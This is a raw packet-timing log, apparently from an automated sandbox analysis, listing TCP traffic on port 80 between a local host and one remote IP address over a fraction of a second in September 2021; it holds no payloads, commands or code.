Sep 27, 2021 18:33:09.113651991 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113653898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113677025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113692999 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113701105 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113725901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113729000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113749027 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113770008 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113771915 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113795996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113817930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113811970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113840103 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113842010 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113866091 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113890886 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113893032 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113915920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113938093 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113940001 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113961935 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113965034 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113986969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114008904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114010096 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114033937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114048958 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114054918 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114077091 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114083052 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114106894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114116907 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114130020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114142895 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114154100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114176035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114181042 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114198923 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114217997 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114223003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114245892 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114259005 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114270926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114289045 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114295006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114319086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114327908 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114341021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114358902 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114365101 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114387035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114409924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114409924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114434004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114439011 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114459038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114480972 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114484072 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114507914 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114516020 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114530087 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114551067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114556074 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114573002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114594936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114597082 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114617109 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114625931 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114650011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114665985 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114675999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114698887 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114707947 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114722967 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114747047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114756107 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114768982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114789009 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114792109 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114814997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114819050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114844084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114861965 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114867926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114892006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114898920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114909887 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114933014 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114937067 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114959002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.114978075 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.114983082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115005970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115005970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115027905 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115046978 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115051985 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115075111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115087986 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115098000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115134001 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115147114 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115159988 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115161896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115187883 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115189075 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115219116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115220070 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115231991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115242958 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115257025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115278959 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115287066 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115303993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115326881 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115329027 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115350962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115353107 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115374088 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115395069 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115396023 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115417004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115439892 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115442038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115463972 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115473986 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115490913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115509987 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115514994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115537882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115556002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115561008 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115569115 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115583897 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115597963 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115608931 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115626097 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115628004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115645885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115664005 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115680933 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115705013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115711927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115726948 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115731001 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115753889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115776062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115777969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115798950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115807056 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115820885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115844011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115845919 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115865946 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115890026 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115890980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115901947 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115916014 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115937948 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115937948 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115962982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.115968943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.115988016 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.116008997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.116013050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.116031885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.116054058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.116055012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.116080999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.116090059 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.116106033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.116130114 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.116168976 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.121153116 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.123166084 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.127021074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127054930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127078056 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127101898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127137899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127141953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.127166033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127190113 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.127207994 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.127247095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.127820969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127859116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127877951 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127896070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127913952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127932072 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127959013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.127973080 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.127981901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.128009081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.128031969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.128036976 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.128055096 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.128063917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.128077984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.128101110 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.128109932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.128124952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.128149986 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.128179073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130537987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130584002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130618095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130625010 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130641937 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130651951 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130670071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130675077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130696058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130722046 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130831957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130856037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130877972 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130882025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130908012 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130913973 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130934000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130939007 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130956888 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.130963087 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.130990028 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131016970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131040096 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131061077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131084919 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131112099 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131162882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131208897 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131254911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131288052 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131303072 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131309032 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131331921 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131345034 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131352901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131378889 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131383896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131427050 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131437063 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131450891 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131473064 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131496906 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131510019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131525993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131541967 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131567955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131578922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131601095 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131620884 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131622076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131644964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131659031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131668091 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131690025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131691933 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.131731987 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.131740093 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138297081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138331890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138359070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138384104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138470888 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138482094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138505936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138509035 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138529062 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138571024 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138582945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138596058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138614893 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138642073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138668060 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138711929 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138756990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138782024 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138802052 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138828039 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.138869047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138894081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.138933897 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139008045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139033079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139055014 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139059067 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139079094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139101982 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139111042 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139142036 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139169931 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139182091 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139195919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139216900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139225006 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139238119 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139252901 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139260054 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139282942 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139306068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139322042 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139328003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139348984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139358044 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139372110 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139384985 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139394999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139415979 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139419079 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139440060 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139461994 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139470100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139499903 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139513016 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139535904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139538050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139565945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139592886 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139626980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139666080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139674902 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139693975 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.139708996 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.139975071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142229080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142261028 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142283916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142304897 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142308950 CEST	49741	80	192.168.2.6	23.88.105.196
